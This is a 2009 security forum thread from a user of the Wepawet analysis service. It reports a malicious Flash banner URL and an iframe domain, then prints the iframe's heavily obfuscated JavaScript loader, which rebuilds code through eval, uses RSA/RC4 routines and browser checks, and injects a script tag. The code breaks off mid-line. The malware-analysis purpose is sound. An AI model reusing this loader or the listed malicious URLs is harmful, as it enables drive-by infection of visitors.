Author Topic: Wepawet issues  (Read 57007 times)

0 Members and 1 Guest are viewing this topic.

May 06, 2009, 11:20:27 pm
Reply #60

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Can we get support for the newer flash versions added please?

http://www.clicksmanagementscom.com/banner/b87492/ggg-2-en.swf

Ref:
http://www.mywot.com/en/forum/3299-sign-of-the-times

Site also loads an iFrame to;

visitcouns.com/?t=1

Which returns content that's completely unreadable.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 06, 2009, 11:25:39 pm
Reply #61

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Got the content to return correctly;

Code: [Select]
<body><script>OJOVLR=self;window.GENWSF='e'+'v';OJOVLR=OJOVLR.GENWSF+'a'+'l';EJEFHF=window[OJOVLR];if(!EJEFHF)EJEFHF=document[OJOVLR];OJOVLR=EJEFHF;VYGLDW='';GQF='s.m=m}function NMQ(x';TTD='}function PCY(){v';IXP='is.n=QEE(N,1';HFM='BI_FP-B;A.prototyp';ZYS='n") break;b=b*';JEG='}re';HXF=' d=(1<<';OVO='i]>>(p';OCG='){ret';ENJ='=8)k=3;else if(b==2';IOY=';y=(y*(2-(';POE='.appName';MBV='KV=TZT;A.pr';QYU='c;r.t=i;r';DXK='d.charAt(i)';WUL='=(this.j+thi';WIG='}this.t=0;this.s=0;';TMW='i=0;i<a.length';PEB='e(--i>=0)if((r=this';GPB='J)>0)a.EK';HCL='function';LWH='[i]=i;j=';FPZ='his.t';VGF='[j]+=thi';GSH='ngth){a+=';XXJ='loor(Math.random()*a';TSQ=';s[j]=x;c';RFC='JZT(c,';KQJ='7ac76d88c3368c35';JSP='prototype.DV=(1<<B)';QCE='VFO(i);return';EMP='"!=typeof a)this.Q';JPI='0)ret';MVL='continue}mi=false';QXV='T=EJJ';IDK=',b){ci="';MUT='j,c,n){var a=x&';GHU=',1);if((r[i+x';TZF='=x.am(0,y[i],';QXJ='}function ZIX(';MWM='b)-1;var e';YZN='h=this.mp';BHB='nction ZWO(x){t';KUN='eturn 0;var x=';YOM='d=(1<<b)-1;r[';MBC='{z.XKS';JZL='i=(i+1';NDW='v;rr="a".charCodeAt';NKH='WD=0;RIP()}f';GEK=';var BI_FP=52;';BTS=')}SEU=((0xde';TTE='h.sin(oil)*21));';YZS='){x=t';POV='sss="";for(';FDX='ction Q';MSU='256)k=8;else if(b==';OKE='O(this.e,this.n';FGF='CJI(b){if(';RCD='(a,(this.n.';OIX='r v=x';JJJ='m.EKV(r';ZXB='s.DB){this[this';HZZ='10ec1246fa9068f78';OSR='crosoft Intern';HFO='KM=QRQ;A.prototy';GUE='M(A.FVJ)>0)this.';YVF=');res=rsa.encry';SVJ='tion ZJB(x){ret';UZY='6);if((h.len';HWW='s[i]=s[j]';ZVW='is.VBX(r);retu';RBQ=')];return(c==nul';VDX='(d)}}re';FXY='[i-1]';ZKS='on FHD(m,q,r){va';PJB=';return}if(r==null)r';QQH=';A.prototype.E';DBU='vigator.appVersi';SIS='his.e=0;t';SGZ=']=c&this.DM;c>>';GLJ='TZY=HT';CGS='0]=this';QJH='+]=this.DV+c;el';UVT='e.OYN=PCY;A.prot';KHS='n r}fu';GJZ='<=0){p+=';UJR='z.ZXK(r2,g,r);el';ZLM='K(r){for(var i=th';LEN='ix(s,b);return';MGN='*y)&0xffff)))';YOS='.XKS=PFD;functi';RZE='this[i];r.t=t';VMY='or(i=0;i<x.t-1;++i)';VTV='f(k==8&&(s[0]&0x80)';NRU='s.m,null,r);if(x.';YJH='his.m=m;this.mp=m';UPM='x=t;r+=8}if((t=x>';BCK='}func';ELB='==4)k=2;else return';TTX='{if(b<';WQY='ototype.QYW=UVT;A.pr';PSS='j=0}fun';FET='urn(this.s';HJM='=BHF;A.prototype';OJR='ffff}return c}f';URW='3;else i';DPV='!=0){t';YQO='otype.YWW=GZ';JXG='1]|=((1<<(th';BTF='){';GHY='s[i]&d)<<c;';SMW='this.i=(thi';CFK='g.fromCharCo';ZNM='t(KFY);for(RWD=0;RWD';WBM=' OVS(b)';FHP='ile(--i>=';RRI='=="="||';XQY='r.s=th';WGQ='var c=t';WKO='NYB(s,n){var a="";v';DGM='6;++vv)RH';NWG='unction ';TBB='DB}c+=this.';TZC=']=i;';WFO='otype.mod=URR;A.prot';NMZ='n QEE(a,r)';GJS='return(y';WGF='(m);if';TOH='&0xfff';HOY='null)?nbi():q;y.YWW(';POK='=c.SLR(1';TCU=']=vv;function GJM(n';ZNG='(d.charAt(i));c=';KVN=' h;else ret';DWB='otype.EWO';COR='ion E';OND='+=Strin';TNX='if(isNaN(oil)){k=';OXN='length])&255;t=th';YXZ=' scriptTag=';SUD='createElement("scr';ROL='.EKV(this.m';QFC='DB;--i}';TKL='.length)';BSJ='TUVWX';DIB='C.prototype.init=X';VKZ='r);while(';BPQ='if(sh>0)this[this.t-';BHT='0;if(c<-1)r[i+';MNF='a="";';MOI='pt(sss);';SSN='rypt(a,b)';GPY='}var a=n';MWV='is.t-1;i>=0';UPU='0;for(i=0;i<2';FIL='urn"0"+h}RSA';HXU='])';IRG='eturn';IVT='0;i<b;';EER='rypto.';ZVQ='tion RSAKey(){t';BTH='=parseInt';ZTX='r(n/this.DB);i';FXI='ull,r);i';FJL=';while(i<m){c+=this';ILM='BQY,53);a';UYP='CR;RSAKey.p';ONS='oil;oil=0}s=new';TLC='[(s[i]+s[j])%256';SNI='Y=new ';LFN='RX;VXC.prototype';QHF=';var r=nbi(),r2=n';VJE='se{va';UPE='PFD(x';FDM='){return';HZI='lse this.t=0}fu';GUJ='m.s;var c=this.DB';CXV='T;A.pro';VCY='n r}function H';WZZ='ll;th';OHD='ion PQE(a,';RYE='ction A(a,b,c){if(a!';PFL=')-1;g.TZY(r);while';NUU='turn m?r:"0';ZVH='lmnopqr';MNK='{x=t;r+=1}retur';UBP='rototype.ZXK';BDN='6*Math.random()';YTO='>=0){var k=(r[-';BJL='.prototype.';RLI='<KFY.leng';QOF='unctio';FNV='.DV){';KZL='i();this.abs().';SEG='i];r[i++]=';WWZ=')RHZ[rr++]=v';ZSB='UW=nul';LSO='ing.fromCharCode(';ONI='=4;else if(b==8)k=';ZSD='e,z){if(e>0xffff';CIB='TZY(r);th';LQK='&this.DM;c>>=t';RQL='E!=null&&N';BOT='+=this[';LDW='h+k>thi';FRL=';r.OYN()}functi';YDJ='[j++]=l&0x3ffff';XDS='n){while(--n>=0){va';LHF='KM(this.m)>=0)x';VUG='(c==1?';BKN='+]=t>>>8;K';QBY='this[i]>>b}if(b>0)r';YEI='n rc4Dec';NKE='YN();if(c>0)r.KSV(c,';VIG='ag.src="?"+res;doc';BGG='==0)return;var g=f*';STK='j=(j+';HBW='s.charCodeAt(i';YIZ='{var d=Math.f';QIG='x&0xff';CVK='6;var VHY;';MYI='type.SLR=CJI;A';OIY='m(i+1,2*x[i],r,2*';FDN='gth&1)==0)r';KCP='V(t,r)}}if(q!=n';VZX='ew Array();v';CYM='>28)+(m>>14)';VZS='0,this.';SDU='nction';ULC='V(r,r);retur';ISQ='r){var x=this.abs()';DJL='ength';MGC=')<<(k-p);d|=this[--';ESF='=(x>>8)&255;KFY[RW';ZDF='turn ci}';DMW='=null)if("numb';KDV='this.VBX(r)}';UML='le(i>=0&&n>0)a[--n]=';DNG='=(y*(2-(((x&0xffff)';ZPF='type.doPublic=ZJB;';PWP='i+n]=this[i];for';RYD='funct';DTX='(--i>=0)';ODG='.EKV(q,q)}r.t';KWW='(1<<p)-1)';IVO=')}UWR.proto';GJY='mp&0x7fff;this.mp';XPY='i]&0x7';IFP='r i=s.length-1;whi';ZPG='unction IVS';JID='.encrypt=HBJ;';QFJ='f(b==';IML='fghijk';MRR='s.m.am(0,a,x,i,';CUH='nction hexToString(d';BRJ='f(this.s<0';IRJ='30ab118834d';MJW='2ec26a4a6be8685';RVS='+]>>14;var m=xh*';MFR='s;while(i<this.t){c';LXL='DM,i;for(i';LFB='ar rr,v';HSX=' h=this.FV/';BTD='is.QUF=null;this.E';IPE='if(oil>1){oil=MII(';XMU=' LMO(s,n){if(n<';PJF='0)r[i]=0;for(i=0;i';JFJ='RSAKey.prot';IXQ='rsa=new RSAKey();rsa';GNN='4f2af68d26c8a815';TJK='.ONE.YWW(d,t);t.EKV';XPB='r(vv=0;vv<=9;++vv';IUO='0);for(vv=10;vv<';NCI='&this.DM;while(thi';DIL='c;r.t=this.t-a;r.';ZUU='A.prototype.FV';YCZ='return new A(a)}func';QPI='(--i>=0)r[i]=0;f';KRG='.protot';FVO='function';HTW='s.t-1]|=x<<sh;sh';HKN='s[i]>>p)>0)';LWW='2)k=1;else';TCJ='f)==0xefcafe);fun';JJH='rstuvwxyz";var RHZ=n';VWI='&0x3f';HNZ='12138513';UYS='EQY(x){return x}f';YSO='rn r}function YJG(';PWQ='s.mpl=this.';ZSE='urn null';FOW='tscape"))';ZBZ='urn 0;var y=';BSY='bs();var ';MGH='z=new UW';FEH='s[this.t++]=(x>>';ILO='b==16)k=4;else if(b=';HUM='.prototype.OBN=H';VYE='x){KFY[RWD++]^';ZUG='.length';LNB='50882';BZZ=')+"\\n";i+';IJT='.DB-sh))-1))<<sh;thi';BMM='&&r.PKM(A.FV';MOT='urn c}if(SEU&&(navi';DMT='_FP);A.pr';DOU=',sh=0;while(--i';CWC='i<this.m.t;++i){v';WMO='ITF()+7)>>';KQQ=')return r;var ';VSE='lse if(x<-1)th';KMQ='v;rr="0".charCo';ODX='on<"5"&&window.cr';OPI='=this.s-a.s;if(r!=0';XIE=');RWD';QSQ='is.S[j';SLI='l;this';POH='M))}function G';SWL='type.abs=KHO';MEI='(0);for(vv=10;vv<3';SWJ='=true;';RJU='&(d=thi';RIK='is[0]=x+DV;e';EJU='er"==typeof a)thi';BZU='while(--n>=0){var l=';MBG='(i=oil;i<256;i++)';ZFQ='ion VT';YSP='.t]+=x.a';LHJ='l<53;oil++)sss+=Str';NFS=' r}function KTQ(s,b)';BON='ffff|';XBB=' if(b';XEN='(x){var';OGH='F1)/g,e=1<<this.F';ZSZ='on UYK';ZIM='C;B=30}else if(S';FDY='}oil=0;funct';RQM='ype.VBX=YJG;F';SBZ='*l+((m&';NNB='{m=true;r=GJM(';ZIV='e.F2=2*B-BI_FP;var Z';GMP='is.S[this.j]=t;re';EQS='.CME=null}function I';HSN='r t=r;r=r2;r2=t';TSL='6;++i)';BYJ='N();if(mi)A.';IUF='xp(e,z)}A.proto';GGL='(r,r)}function U';HSE=')}function HBJ(a){';TRM='.QWB(this';FTF='.setPublic("983';JMH='otype.setPublic=I';DLG='n QYQ(n,r){for';OCX='W(j,t);r.EKV(t,';OCF='{';LQF='RHZ[rr++';SZX='g.fromCharCod';XTN='unction ';HNM='++]=x;else if(s';YGB=',w,j,c,';DVS='--);a';QCF='r){var i';ZEQ='++]=z.charCodeAt(t)';KNC='EKV(t,r)}A';PNW=' Array()';CRR='ZT(n,';KBM='f4c2d744e';ZMY='l)}function LGD(i,x';OVR='0xf)*y))&0xf';WOL='(d,d+1)';GRW='ff}ret';EJN='mpl+(((j*this.mp';VKG='.t>0)?(this[0]&1';KTB='<=0)re';KJX='document.';ING=')&255;if(RWD';OQO=';k+=';ZLG='=null;t';RPZ='urn r;return';MGZ='avigator.a';MTR='=x&255;KFY[RWD++]^';CMY='B-15))-';UBE=' RIP(){IKH(n';CNP='=QWX;function ';VWN='turn V';SCY='CR(N,E){if(N!=null&&';CSP='[--n]=0;';CRB='pe"&&na';KWL='LGD;B=26}else{A.p';SGM='+y.t;wh';IPV='0;r.OYN();i';ZTM='.next';YVC='oil=0;oi';YRM='])&255]}VX';CUC='ar i=a+1;i<this.';LDY='.DB*(this.t-1)+MWY(t';FXV='s.charCodeAt(i';PWW='23456789+/=";fu';TXY='Z(e,m){var z;';PQE='a;a=k;';XBY='%k;if(';DEI='[i]=this';DSY='b)|c;c=(this[i';HQY='his.n';SMD='i],r,2*i,0,1);r.s=0';IEX='r,i,0,x.t);r.s=';JGH='=this.DB}c-';YQQ='[a]>>';BPV='=n}retur';MHB='ZZ.prototype.';MDT='3);if(';QEM='[i];r[i++';ZJN='e(b.c';LFX='=2;a[--n]=0;';VPG='uncti';KQO='l+h*a;l=a*l+((m&0x';REW='this.S[i]+a[i%a.';MLW='rotot';RDX='type.';IYW=' ZSY.char';NLT='is.S[i];this.S';JVZ='FQV=EQY;UWR.proto';BIO='nextkey=res;var';YJB='on WWM(){if';XCK='type.exp=ZIX;A.proto';HMY='D++]^=(x>>16)&255;K';XDJ='[i]-a[i];r[i++]=c';LZR='totyp';OXI='et Explorer")){A.p';MPF='is.VBX(r)}f';XHS='eturn c';DZX=' r=nbi();x.abs().Y';HHG='0x10)return"0"+b.SL';MCT='b==32)k=5;else if(b';FVZ='ypto){var z=window.c';YOL='s.t>0&&this[this.t';LMF='type.DYC=NMQ;UWR.p';BZV='se if(c>0)r[i++]=';DLI='c!=64)';YQB=' QRQ(a){var r';BLG='turn x.mod(this.';NEV='r m=xh*l+h*a;l=a';ZEN='is.s<<a)';QNL='[e]=c;r.t=';OJZ='s.S[t';EXR='&x.DM;j=i+this.m.t;x';NVX='B=B;A.prototype.DM';YQZ='Y=PES();VHY.ini';EMR=' z=new FZZ(m);ret';XME='WCI(s,i){va';BPR='h+(x[i]';RZH='.OYN()}fu';UBF='0f78625c';DVR='a[--n]=x[0]';MXI='{var c=x.';ILB='s=(x<0)?-1:0;i';VLV='p<k){d=(this[i]&(';XSZ=';for(i=t';FHZ='>4)!=0){x=t;r';HUH='=nbv(0);A.ONE=nbv';UTQ=');if(ts!=ms)A.FVJ';QDI='is.DB-sh))-1)<';VMN='e(i<a.t){c-=a';WEX='>=0){v';EZK='V){r[i+x.t]-=';UHB='XKS=PWS;func';HLB='.t-1]|=(x&((1<<(this';WDM='(y,y);while(y.t<d)y[';TNO='r f=y[d-1];if(f';HOI='this.t+e+1;r.s=this.';LBG='t<this.t){c-=a.';DPX=',j,t;for(i=0;i<25';OCN=' RQL(r){var x=this.a';ETD='LQ;A.proto';JGL='ENT(r);this.VBX(r';UEH='=WEV;UWR.pro';FXB='x(this.t-n,0);r';MZY='r)}fun';UKE='this[i]&0x3f';MVQ=')+xh*h+(c>>>30);w';ZHR='m.t);';WVP='TT(y,r);th';GOS='f(r.t>0)r[r.t-1]+=x';VNH='|e<1)return A.ONE';HVH='c=(l>';ZOH='ile(--n>=0){var l=th';ZSJ='th.ma';HMR='bi(),g=z.DYC(this),i';VDY='s.mt2=2*m.t}f';HBI='r(var i=0;';QOR='[this.t-a-1]|';NTY='totype.QWB=QYQ;A';JEZ='s.t;va';KSO='totype';KLN=';b.TZY(r)}va';NPS='a,r)}f';FHK='>0){a.JZT';EXK=';this.S=new';EIP='++){';IYP=';--i)r[i]=';OUF='();var x=new';OSS='";for(i=';FSL=';r.t=i';FSE='==32)k=5;el';WEV='s<0&&r.PK';PXK='unction MLW(x){x.CIX';VMW='on UVT()';KKB='PES(){return new V';ESV='(i=n-1;i';DKH='.ENT=RQL;A.protot';LKG='.am=FBO;B=28}A';QTZ='-1]==c)--this';PJE='=Math.floor(6553';YQT='his.DB';TUN=',r,j,0,d))<k){y.YW';CLP='l)?-1:c}fu';YCN='ar r=nbi();A';XCR='=0;t<';VOD='b){k="";';GZP='urn x.EW';ZXP=';return r}fu';XIL='x>>1)!=0)';MXW='f((t=x>>>16)!=0){x=t';LDR='this.s<0)return"-"';UOM='0x4000000';LHC='3fff)<<14)+w[j]+c;';XUF=',r){x.ENT(r);';LOI='(VHY==null){RIP();VH';VVT='i=r.t=2*x.';MRJ='x){whil';LYB='i-->0)';JVD='FQV=HPJ;FZZ.protot';DRO=');if(r!=null)this.';SUW='=((1<<B)-1);A.';SRY='x>>15;wh';CRW='his[this.t';RLG='=null)q.VFO(0';TUJ='this.';RQY='K;A.prototype.V';WNK='&0xfffff';KNG='Z[rr++]=vv;rr';FDU=',r);thi';OQK='{if(p<this.DB&';NWQ='r[i]<--';YUQ=']=s[j];s[j';EDJ='var i=s.l';MDY='Array(';PKX='{d=(this[i]>>(p-';JKD=';this.j=0';MUI='}else this[thi';ZKL='i)=="-")mi';UZC='return a';GWB='<0){if(s.charAt(';NCP='nction HT';PWH='(i*this.DB)';QOD='.s=this.s}funct';CPN=',mi=false';GEY='nction UWR(m){thi';KDQ='YZabcde';IOB='s[this.t';RMJ='adbeefcafe';FPX='}function FBO(i,x,w,';UMQ=');w[j++]=v&0x3ff';CBH='n WWMs(a){var i';JFR=';if(sh==0)thi';EHG='r[i+e+1]=(this[i]>>';VQG='<sh}this.OY';DOF='&(1<<i))>0)';OVT='ar i=0;w';MPV='ngth>0){th';OTU='-a;var';CUV='pe.ITF=YSB;A.prot';THW=')k=1;else if(';JED='eAt(i%a.length))%25';BPP=']&d)<<a}for(i=e-1;';YDB='tion DLT(){r';QKT='.DB)sh-=this.DB}i';VNE='ument.bod';WUO=']=x}i=';FNC='WW(this.m.';KFX='BQY="ABCDEFGHIJ';LBU='0;this.';UBL=';r+=2}if((t=';ZET='am(i,x[i],r,2*i,0';BUE='>>15)*this.mp';XXC='}}return z.FQV(r)}';YWX='JJ(n,r)';QYE='V))%this.DV;';HNB='fff;var a=(j*this.';WGI='<a.t){if(q!';NNG='ff;var h=this[i+';ECB='|x.PKM(this.m';FOS='-MWY(a[a.t-1]);if(c';SVI='i=this.t;r=i-a.t;if';DBV='=nbi();var y=nbi(),t';WZH='=a.s}r.s=(c<0)?-1:';EYZ='th;++RWD)KFY[';JJV='n a+s.substring(i,s';RCV='rseInt(b/c));';OBO='PJ(x){var r=nbi();x.';PEI='arCod';TPU='[i]-a[i])!=0)ret';HGE='s)A.FVJ.EKV(r,';HFZ='FY[RWD++]=t&';TQV='OYN()}function T';HNS='2;var i=r.t,';RJZ='r p=this.DB-';FZN=' 0}function MW';EHN='}WFW.protot';BXB='FO=ZWO;A';JYZ='s.VBX(r)}FZZ.p';NKQ='.length>0&&E.le';JPK='harCod';ERU=');ci+';WZU='s.QZP(a,';LGZ='this.um=(1<<(m.D';DGT='turn;var b=this.ab';UUM='-i]==f)?';YKK='r a=m.abs();if(a.t';DLC='{var i';ECS='ar j=x[';JMI='nctio';NXV='oil;j=oil;';KSC='urn t';VCB='}x.OYN();x';KLK='2-x*y%this.D';BEV='his.i=0';QJQ='his.DB-b;var ';NQM='(1<<this';PWN='B(){if(this.t<=0)ret';MZJ='j=oil;for';OGN='ffffff);c=(l>';FQZ=';A.prototype.KSV=UYK';TWM='FZZ(m){t';RUM='.S[j];th';DYI=' Arra';IKL=' MII(a';GLI=');KFY[RWD+';TUI='>>30)+(m>>>15';CKD='{var a=n%';TRT='.QYW();thi';RPJ='his.t=';UJP='y()}func';SUR='[j]+c;';XTG='=Math.pow(2,BI';PNB='se if(b=';RBT='0x3fff,xh';GEU='}function';LWE='[this.i];this.S[this';DPM='{a+=Strin';HJW='+e)*d2);if((r[i]+=y';NGQ=':-y}function ';XFQ='b;for(v';FEM='h=this[i++]>>15;va';GCK='+=this.DB-k)}else';GQD='"}function HLQ(){v';FNI='Number(a,b,c);else i';XRW='(j+s[i])%';HOU='rototype';MTQ='s;r.OYN()}functi';ICY='f(this.s!=a.';RBJ='b.SLR(1';LLU='y.t++]=0;while(--j';KTE='his.i])&255;t=this.S';NFD='[x.t++]=0;fo';TFW='=a.substring';BLK='while(x[j]>=x';VVN='e(i>=0){if(';RID='-1]^(this.s&this.D';GGP='>>15;';PVI='Y(x){var r=1,t;i';GOU='+]=1;r.';RKO='ototype.ETT';IBG='j,t);if(r.PKM(t)>=0';CUR='ppName=="Netsca';BBD=';scriptT';SMO='.t=this.t';HKY=']=t}this.i=';QLC='=0;var t;if(n';CHV=',x)}function PWS(x';XKM='0;while(x[0]==0)b.Y';IFL='n(a.t,this.t)';ZTT='0)m=true;if(m)r+=GJM';YMU='s.from';CMO='var KFY;var RWD;f';WYR='xff:WCI(s,i);if(x';UPS='ipt")';OKR='his.DB;var c=t';KEG='}if(d>';OGB='ptTag);';POL='this[0];if((x&1)==';ZRQ='):this.s)==0';OIV='6789abcd';NME='k)r.EK';URG='y.appendChild(scri';DNQ='urn 0;return this';IFN='(var i=n;i<this.t';PBU='b%=c}}';PPI='(r,r2);if((e';NMS='){if(x.s<0|';TPH='XC()}var R';GUD='r);if(ts<0)A.FVJ.EKV';IID='BI(x);';HON='s=this.';HNO='{A.prototype.am=';QCN='unction IKH(';GIK='nction nb';JUY='n null';YPB='.F1)+((d>1)?y[d-2]>>';RXZ='-1;i>=0;--i)r[';QSC='null;this.q=nu';BJJ='=4)k=2;';VLI='r[i-a]=';MNJ='256;x=s[i];';QHB=';for(';FZK='n r}function YS';QYI='ZZ.prot';SIH='=(this.s&d)<<';WFX=';++i)a[i]=W';CDD=';++i)r[i-n]=this[i';YQS='{return PQE(a,b';JFW=';i++)s[i';FUF='Math.floor(75+Mat';RTP=',r){x.';BLX='SY="012345';SCS='CIX(a,n';GIP='f(a>=this.t){r';OQZ='unction ';UMS='deAt(0);fo';BXS='EU&&(navigator';WIF='tion XRX(a)';LTR='6)}function';ZGR='(n,r){';JYU='ype.CIX=FHD;A.pr';PBY=' a=(1<<k)-1,d,m=f';EZT='ype.YBI=WWMs;functio';YRD='f(b==null&&"string';SCT='t,r);r.CIX(thi';KWX='c="";for(y=0';EPP=' this.toRadix(b);var';WPU='ll)return null;';RLZ=')}if(KFY==null){KF';NYO='EC=25';BFX=';y<b.length;y++){';FIR='gator.appName=="Mi';MJE='(c,y);b.';NML=')>=0)re';WVV='.FVJ.EKV(this,r)';VYM='+=4}if((t=x>>2)!=0';IDW='this.DM:Math.fl';VTJ='+=k;if(sh>=this';RBM='BN().SLR(b);va';OUR='hile(RWD<REC){t';DLZ='y();while(n>2){x[0]=';CQE='efghijklmnopq';KUE='&this.';DGI='B;var b=t';IYT='(this.DB-sh))';IHR='RWD]=0;RWD=0}re';HHD='eAt(y)^s';FDK='=d;r.O';QLB='Key.proto';DQC='>0)?th';PLZ='R(m);else';OQX='=x.DV;x[++j]++}';JZG=',y=a.abs();var i=x.t';RKQ='s}else{';OSD='random(32);for(t';REF='his.e';JZT=';var h';IWE='f(x>0)this[0]=x;e';RRC='ype.DYC=IVS;F';VUS='rototype.am=IV';UXY='];r.t=Ma';WZO='d)}whil';NYT='ew Array();va';IYS='.prototype.D';TQM='64+BQY.indexOf';JNC='s[i]+a.ch';EXP='x=s[i];s[i';JBI='eturn((this';OWG='pe.FNV=DLT;A.proto';LQT='b)}function nbi(){re';ELW='&255}w';YCB='.i]=this.S[thi';MJP=';A.prototype.P';UIF='e return ';KLV='=k))&a;if(p';QRV='oor(r[i]*h+(r';OBE='x&3;y=(y*(2-(x&';CTZ='r k;if(';RFP='.m.t,x);if(x.P';GOT='HY.next()}functio';DXX='!="Ne';VTP='+this.O';SDD='for(i=oil;i<256';EQR='m,null,x)}fu';LPR='=ci};var m=LMO';OMJ='992751","10001"';DCP='de(pa';DQT='(c==nul';CCJ='otype.ZXK=FZI;FZZ';SJQ='=Math.floor';TED=';r+=16}';QXZ='1;this.';KGX='.t}function ';XUX=')*y))&0xff;y';OXV='ZP(a,256);else thi';KLI='ototype.F1=';MHV='s.length+11){ret';FWV='ew Date().getT';DJZ='his.d=null;this.p=';YUW='>=REC)RWD-';ZWD='="A".charCodeAt(';ZIY='j=i-d,t=(q==';ULN='s();if(b.t';XTC='v(i){var r=nbi();r.';DHM='KLMNOPQRS';VHB='if(';RYS='.prototype.JZ';NQS='c&this.DM;c>>=this.';NWW='0x7fff)<<15)+w[j]+(c';JMZ='i>=0;--i)r[i]=0;r';CSN='is[i]&0x7fff;var ';EVH='c+=this.s;whil';TWW='=0,c=0,m=Math.mi';YBM='s,ms=';HZG='RR(a){var r=nb';UXQ='alse,r="",i=thi';USP='{if(this.t<1)r';YXH='this.F2:0);var';GPQ='}functio';MJG='x.DV;r[i+x.t+1]=1}}i';FSI='*this[';DHS='is.DV-y';IJQ='c=Math.floor(v/';ZOR='turn new A(nul';JDV='ction';QTM='w[j++]=l&0xfffff';NVE=',r);retur';GSK='r c=RHZ[';BSC='e(x.t<=this.mt2)x';DPL='s.i+1)&255;this.j';EQP='this}fu';UPB='m==nu';XNR='){r[r.t+';WOS='i+1,c,x.t-i-1))>=x.D';LNM='s.s}functio';JHM='n BHF(a,';VGY='.S[(t+this.S[this.i';FRP='if((t=x>>8)!=0){';CUJ='nction KHO(';CCK='nction WEV(x,y,';FNK='s.substring(i,i+n';LYE='r d=y.t;va';CBU='turn this';GHS='=x>>14;';RII='=REC}function';BGC='64:c/4);if(';ZZQ='his.t;r.s=this.s}fu';RCB='i++]+w';PLG='t;++i){r[i-a-1]';JNK='b20094bded52ed';MGI='this.D';ZWW='i++)';XGP='+xh*h;';HGM='R(16);els';NTO='+n;r.s=thi';VXL='ar c=this.s';WWF='.t=0;return}';XKZ='56;++i){j=(j+';DTP='s.j];th';WXP='=MWY(e';SDV='his.s=-1;';DNM='this.S';FWX='r)}else{a.TZY(y)';EBC=')%256;j=';CCX='f;y=(y*(';HJB='or(i=0;i<d.length;i';HFP='fff}return c';DWX='l)retur';TTW='(n/this.DB),c=(th';GXP='ototy';LDO='if(e<256||m.FNV())';RRO='(1);function VXC(){t';UFJ='1;thi';RFF='his.doPublic';MHP='{return new A(';JHV='ype.QZP=KTQ;A.pro';KLT='ull){r.QWB(d,q';GCS='WX(){var t;';NRY='x[j]-';OMY='ZT(a,r){var i';BWJ='{var k;if(b==16)k';YUF='his.DB}if(a.';WHX='m);else return x}f';DHZ='ime()';RLS='.am(i,x[';LJZ='.am(0,k';UXR='|=(thi';VZW='l)&this.um)<<15))';DVT='g,d2=(1<<this.';QVY='b=0;c=1;f';KPQ='36;++vv)';LCK='At(n)}function ';QDY='rototype';BGY='TZY(r)';YFN='var b=new WFW';QGD='=this.t-1;i>=0;--i){';IUR='rototype.';ZBP='(r!=0)return r;whil';RLH='<y.t;++i)r[i+x.t]';SGX='type.VBX=MLW;UWR.p';HMX='n IVC(i,x,w,j,c,n)';SXW=' Arra';DXQ='WM()}function WFW(){';YSH='hile(i+n<s.le';KSM='ar x=(k==8)?s[i]&0';PKE='}r';EFP='6;';OYZ='{var a=x&0x7fff,xh=';JDP='(this.';ZGV='else{this.fromRad';WJD='z.length;++t)KFY[RWD';HCU='>=0;--i)r[i]=0;r';JZD='(E,16)}';LMT='d.charAt(i)=="\\';QVK='var b=n%t';KME='FY[RWD++]^=(x>>24';YNR='stuvwxyz01';GNT='is.s;var a=Math.floo';LPQ='t;while';XOO='<0)?this.OBN():';WSQ='255}R';NZN=' FZI(x,y,r){x.ETT(y';SFX='FVJ.EKV(this,this)';QNS='=VTZ;A.FVJ';NHS='}a[--n]';NPY='r){x.E';PPL='6);this.e';VYGLDW+=HCL+IKL+IDK+OSS+IVT+ZWW+YIZ+XXJ+ZUG+ERU+TFW+WOL+JEG+ZDF+KFX+DHM+BSJ+KDQ+IML+ZVH+YNR+PWW+CUH+BTF+MNF+QVY+HJB+EIP+VHB+DXK+RRI+LMT+ZYS+TQM+ZNG+VUG+BGC+DLI+DPM+CFK+DCP+RCV+PBU+UZC+FDY+OHD+VOD+TNX+ONS+PNW+OQO+PQE+SDD+JFW+TZC+MZJ+MBG+OCF+STK+JNC+PEI+JED+EFP+EXP+YUQ+WUO+NXV+KWX+BFX+JZL+EBC+XRW+MNJ+HWW+TSQ+OND+SZX+ZJN+JPK+HHD+TLC+HXU+PKE+XHS+GPQ+YEI+SSN+YQS+BTS+RMJ+WNK+TCJ+RYE+DMW+EJU+YMU+FNI+YRD+EMP+OXV+WZU+LQT+ZOR+ZMY+YGB+XDS+OIX+FSI+RCB+SUR+IJQ+UOM+UMQ+OJR+QOF+HMX+OYZ+SRY+ZOH+CSN+FEM+NEV+SBZ+NWW+VWI+OGN+TUI+MVQ+YDJ+HFP+FPX+MUT+RBT+GHS+BZU+UKE+NNG+RVS+KQO+LHC+HVH+CYM+XGP+QTM+GRW+MOT+FIR+OSR+OXI+VUS+ZIM+BXS+POE+DXX+FOW+HNO+KWL+QDY+LKG+IYS+NVX+SUW+JSP+GEK+ZUU+XTG+DMT+KLI+HFM+ZIV+BLX+OIV+CQE+JJH+VZX+LFB+KMQ+UMS+XPB+WWZ+NDW+MEI+DGM+KNG+ZWD+IUO+KPQ+LQF+TCU+FDM+IYW+LCK+XME+GSK+HBW+RBQ+CLP+NCP+ZLM+MWV+IYP+RZE+ZZQ+BHB+RPJ+QXZ+ILB+IWE+VSE+RIK+HZI+GIK+XTC+QCE+NFS+BWJ+ONI+URW+QFJ+MSU+LWW+XBB+FSE+PNB+BJJ+ZGV+LEN+WIG+EDJ+DJL+CPN+DOU+WEX+KSM+WYR+GWB+ZKL+SWJ+MVL+JFR+IOB+HNM+LDW+ZXB+HLB+IJT+FEH+IYT+MUI+HTW+VTJ+QKT+VTV+DPV+SDV+BPQ+JXG+QDI+VQG+BYJ+SFX+TTD+VXL+NCI+YOL+QTZ+KGX+FGF+LDR+VTP+RBM+CTZ+ILO+ENJ+THW+MCT+ELB+EPP+PBY+UXQ+JEZ+RJZ+PWH+XBY+LYB+OQK+RJU+HKN+NNB+WZO+VVN+VLV+KWW+MGC+OVO+GCK+PKX+KLV+GJZ+TUJ+QFC+KEG+ZTT+VDX+NUU+GQD+YCN+WVV+ZXP+CUJ+OCG+FET+XOO+EQP+SDU+YQB+OPI+KQQ+SVI+ZBP+PEB+TPU+RPZ+FZN+PVI+MXW+TED+FRP+UPM+FHZ+VYM+YZS+UBL+XIL+MNK+FZK+PWN+D